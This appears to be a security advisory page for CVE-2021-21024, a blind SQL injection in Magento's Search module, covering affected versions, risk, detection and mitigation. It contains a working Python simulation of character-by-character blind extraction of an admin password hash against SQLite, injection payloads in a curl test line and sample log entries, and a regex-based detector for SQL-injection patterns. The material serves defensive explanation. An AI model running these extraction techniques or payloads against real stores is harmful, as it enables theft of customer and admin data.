Platform
php
Component
magento/community-edition
Fixed versions
2.4.2
2.4.1
2.3.7
2.3.6-p1
CVE-2021-21024 is a blind SQL injection vulnerability in the Search module of Magento Community Edition. An attacker who already has access to the admin console can exploit it to gain unauthorized access to restricted resources; it is not reachable by unauthenticated users. Affected versions are 2.4.1 and earlier, 2.4.0-p1 and earlier, and 2.3.6 and earlier. Fixed releases are listed above: 2.3.6-p1 for the 2.3 line and 2.4.2 for the 2.4 line.
Even with the admin-access precondition, the flaw poses a significant risk. An attacker holding administrative credentials (or a hijacked admin session) can craft search queries that make the database evaluate attacker-controlled SQL and so read data the admin UI never exposes directly: customer PII such as names and addresses, order history, payment details if the store stores them, and the password hashes of other administrators. Depending on the privileges of the database user Magento connects with, the attacker may also be able to modify data, enabling fraudulent orders, account takeover or denial of service. Because the injection is blind, the attacker never sees query results in the response and must infer them from differences in behaviour (whether a search returns rows, or how long it takes), extracting data one bit or one character at a time; that slows extraction down but does not limit what can ultimately be read. The root cause is the one shared by every SQL injection flaw: user-controlled input spliced into SQL text instead of being bound as a parameter and validated.
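To make the blind-extraction point concrete, here is an added example written for this page (it is not Magento's code) that simulates the pattern in plain Python against an in-memory SQLite database. The table and column names are constructed stand-ins for Magento's schema. `search_vulnerable` splices the search term into SQL text; `blind_extract` drives it through a boolean oracle in which the attacker only learns whether any rows came back, and still recovers the stored admin password hash character by character. The same routine run against the parameterized `search_safe` recovers nothing, because a bound parameter cannot change the statement's structure.

```python
import sqlite3
import string


def build_db():
    """Constructed sample data standing in for Magento's tables (assumption, not Magento's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE search_query (query_id INTEGER PRIMARY KEY, query_text TEXT, num_results INTEGER);
        INSERT INTO search_query VALUES (1, 'red shoes', 12), (2, 'blue hat', 3);
        CREATE TABLE admin_user (user_id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO admin_user VALUES (1, 'admin', 'a1b2c3d4');
    """)
    return conn


def search_vulnerable(conn, term):
    """Vulnerable pattern: the user-controlled term becomes part of the SQL text."""
    sql = "SELECT query_id FROM search_query WHERE query_text = '" + term + "'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, term):
    """Hardened form: the term is bound as a parameter and can never alter the statement."""
    sql = "SELECT query_id FROM search_query WHERE query_text = ?"
    return [row[0] for row in conn.execute(sql, (term,))]


def oracle(search, conn, condition):
    """Boolean-based blind oracle: all the attacker observes is whether the search returned rows."""
    payload = "red shoes' AND (" + condition + ") AND '1'='1"
    return len(search(conn, payload)) > 0


def blind_extract(search, conn, column, table, max_len=32):
    """Recover one value from the database a character at a time through the oracle.

    Returns "" when the oracle cannot be steered, which is what happens against search_safe.
    """
    alphabet = string.ascii_letters + string.digits + "$./"
    recovered = ""
    for pos in range(1, max_len + 1):
        hit = None
        for ch in alphabet:
            cond = f"substr((SELECT {column} FROM {table} LIMIT 1),{pos},1)='{ch}'"
            if oracle(search, conn, cond):
                hit = ch
                break
        if hit is None:          # no character matched: end of value (or the oracle is dead)
            break
        recovered += hit
    return recovered


def breaks_on_quote(conn):
    """Side effect of the vulnerable form: an innocent apostrophe is a SQL syntax error."""
    try:
        search_vulnerable(conn, "o'neil")
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", blind_extract(search_vulnerable, db, "password", "admin_user"))  # a1b2c3d4
    print("safe:", repr(blind_extract(search_safe, db, "password", "admin_user")))         # ''
```

The `breaks_on_quote` check is the cheap tell for string-built SQL: a legitimate search for a name containing an apostrophe raises a syntax error in the vulnerable path and simply returns no rows in the parameterized one. That same class of error, written to the application's exception log, is what a failed injection attempt looks like from the defender's side.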
CVE-2021-21024 was publicly disclosed in Adobe's Magento security bulletin of February 2021 (APSB21-08). No active exploitation campaigns have been publicly confirmed, and the requirement for admin console access rules out opportunistic mass exploitation by unauthenticated scanners, but the reach a compromised or malicious admin account gains makes it a worthwhile target. It is not listed in the CISA KEV catalog. Public proof-of-concept exploits are reported to be available, which raises the risk once an attacker obtains admin access by other means (phishing, credential stuffing, a weak or reused password).
Organizations running any affected release (2.4.1 and earlier, 2.4.0-p1 and earlier, 2.3.6 and earlier) are exposed, particularly where the admin console is reachable from the public internet, admin accounts lack multi-factor authentication, or admin credentials are shared. Shared hosting environments running Magento are a particular concern because tenants often cannot control the underlying server configuration or the patching schedule.
• php / server: look for string-built SELECT statements in the Search module source. The original command used -name with a path, which never matches because -name only tests the file's basename; -path tests the whole path. The authoritative check remains the installed Magento version rather than a source grep:
find /var/www/html -path '*/app/code/Magento/Search/Model/Adapter/Mysql.php' -exec grep -i 'query(' {} + | grep -i 'SELECT'
• php / server: PHP-FPM's journal never contains the words "SQL injection"; what a failed injection attempt does leave behind is a database syntax error thrown by the Search module. Magento writes those to var/log/exception.log, so search there as well as in the journal:
journalctl -u php-fpm -f | grep -iE 'SQLSTATE|syntax error'
• generic web: the original curl line had an unbalanced quote and an unquoted URL with spaces, and grepping for "200 OK" fails on HTTP/2, whose status line carries no reason phrase. The storefront search endpoint is /catalogsearch/result/, and a 200 response proves nothing about this vulnerability (the blind injection returns 200 whether or not it worked, and the affected code is in the admin Search module), so treat this only as a reachability smoke test:
curl -sI "https://your-magento-site.com/catalogsearch/result/?q=%27%20OR%201%3D1--" | head -n 1
Exploitation status
EPSS
2.07% (84th percentile)
CVSS vector
The primary mitigation for CVE-2021-21024 is to upgrade to a fixed release: 2.3.6-p1 or later on the 2.3 line, 2.4.2 or later on the 2.4 line. Where that is not immediately feasible, reduce exposure. Because the flaw is only reachable with admin access, restrict the admin console by IP allow-list or VPN, enforce strong unique passwords and multi-factor authentication for every admin account, and remove unused admin accounts. Put a Web Application Firewall in front of the store with rules that detect SQL injection patterns in parameters sent to the Search module and admin endpoints. Monitor Magento's logs (var/log/exception.log, plus the database server's error log) for SQL syntax errors originating from the Search module, which failed injection attempts typically produce, and watch for bursts of near-identical search requests from one source, the signature of blind character-by-character extraction. After upgrading, confirm the fix on a staging copy by submitting a test injection payload to the Search module and verifying that it is treated as literal text.
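As an added example of the log monitoring suggested above (written for this page; not Magento's code or any WAF vendor's ruleset), the following Python scans web-server access-log lines in the common combined format, decodes the query parameters sent to the storefront search and admin paths, and flags values shaped like SQL injection, including the boolean and time-based forms a blind attack relies on. The sample log lines, the pattern list and the `/admin` prefix are constructed assumptions; a Magento store's admin path is whatever was chosen at install time, so pass your own prefix.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Combined-format access-log line: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Illustrative SQL-injection shapes (assumption: a starting point, not a complete WAF ruleset).
# Order matters: the first matching name is the one reported.
SQLI_PATTERNS = [
    ("quote+boolean", re.compile(r"""['"]\s*(or|and)\s+['"]?\w+['"]?\s*=""", re.I)),
    ("time-based", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("union", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("subquery", re.compile(r"\(\s*select\b", re.I)),
    ("comment", re.compile(r"(--|/\*)")),
]

# Constructed sample log (not from a real store). 203.0.113.9 sends a blind probe, then a sleep().
SAMPLE_LOG = """\
203.0.113.5 - - [10/Feb/2021:10:01:02 +0000] "GET /catalogsearch/result/?q=red+shoes HTTP/1.1" 200 5123
203.0.113.9 - - [10/Feb/2021:10:01:07 +0000] "GET /catalogsearch/result/?q=red%27+AND+%28SELECT+substr%28password%2C1%2C1%29+FROM+admin_user%29%3D%27a%27+AND+%271%27%3D%271 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Feb/2021:10:01:09 +0000] "GET /catalogsearch/result/?q=red%27+AND+sleep%285%29--+ HTTP/1.1" 200 5120
198.51.100.2 - - [10/Feb/2021:10:02:00 +0000] "GET /admin_x1/search/term/report/?q=hat HTTP/1.1" 200 2100
"""


def classify(value, rounds=3):
    """Return the name of the first injection pattern matched, decoding repeatedly to catch double-encoding."""
    seen = set()
    for _ in range(rounds):
        if value in seen:
            break
        seen.add(value)
        for name, pattern in SQLI_PATTERNS:
            if pattern.search(value):
                return name
        value = unquote_plus(value)
    return None


def flag_sqli_requests(lines, watched_prefixes=("/catalogsearch/", "/admin")):
    """Parse access-log lines and return one hit per parameter that looks like SQL injection."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a combined-format line; skip rather than guess
        parts = urlsplit(m.group("target"))
        if not parts.path.startswith(watched_prefixes):
            continue
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            reason = classify(value)
            if reason:
                hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "path": parts.path, "param": key, "reason": reason})
    return hits


if __name__ == "__main__":
    for hit in flag_sqli_requests(SAMPLE_LOG.splitlines()):
        print(hit)
```

The patterns are deliberately narrow (a single hyphen in "t-shirt" does not trigger the comment rule, and a quote alone is not enough) because a search box receives plenty of legitimate punctuation; tune them against your own traffic before wiring the output into alerting, and correlate hits by source IP, since a blind extraction shows up as dozens of near-identical requests rather than one.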
Update Magento Commerce to the latest available version. See Adobe's security advisory for details and specific upgrade instructions.
CVE-2021-21024 is a critical blind SQL injection vulnerability in the Search module of Magento Community Edition 2.4.1 and earlier, 2.4.0-p1 and earlier, and 2.3.6 and earlier. It requires admin console access and lets an attacker with that access read restricted data from the database.
You are affected if you are running Magento Community Edition versions 2.4.1 and earlier, 2.4.0-p1 and earlier, or 2.3.6 and earlier. Check your version and upgrade immediately.
Upgrade to a fixed release (2.3.6-p1 or later on the 2.3 line, 2.4.2 or later on the 2.4 line). As temporary mitigations, restrict admin console access, enforce MFA on admin accounts and deploy WAF rules.
While no confirmed active campaigns are publicly known, the vulnerability's severity and available PoCs make it a likely target for exploitation.
Further reading: https://dev.classmethod.com/en/2021/12/16/magento-2-4-1-security-vulnerability-sql-injection/ (a third-party write-up; the official source is Adobe's Magento security bulletin APSB21-08).